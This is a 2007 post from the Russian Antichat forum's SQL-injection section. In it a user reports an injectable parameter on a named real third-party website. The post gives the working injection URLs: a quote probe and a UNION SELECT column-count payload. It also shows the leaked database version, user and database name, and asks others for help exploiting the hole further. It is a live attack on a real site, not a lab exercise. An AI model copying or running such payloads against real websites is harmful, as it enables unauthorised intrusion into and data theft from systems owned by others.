HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 01.07.2007, 11:28
iv.
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
С нами: 10074686

Репутация: 1204


По умолчанию
nvmu.ru

Подозрение на инъекцию:
Цитата:
http://nvmu.ru/cgi-bin/index.cgi?page=1'
Подбираем кол-во колонок:
Цитата:
http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/*
Version: MySQL 5.1.19-beta
User: nvmu@localhost
Database: nvmu

Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?

PS. Спасибо товарищу из аськи за наводку и заодно, что разбудил меня. =\
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.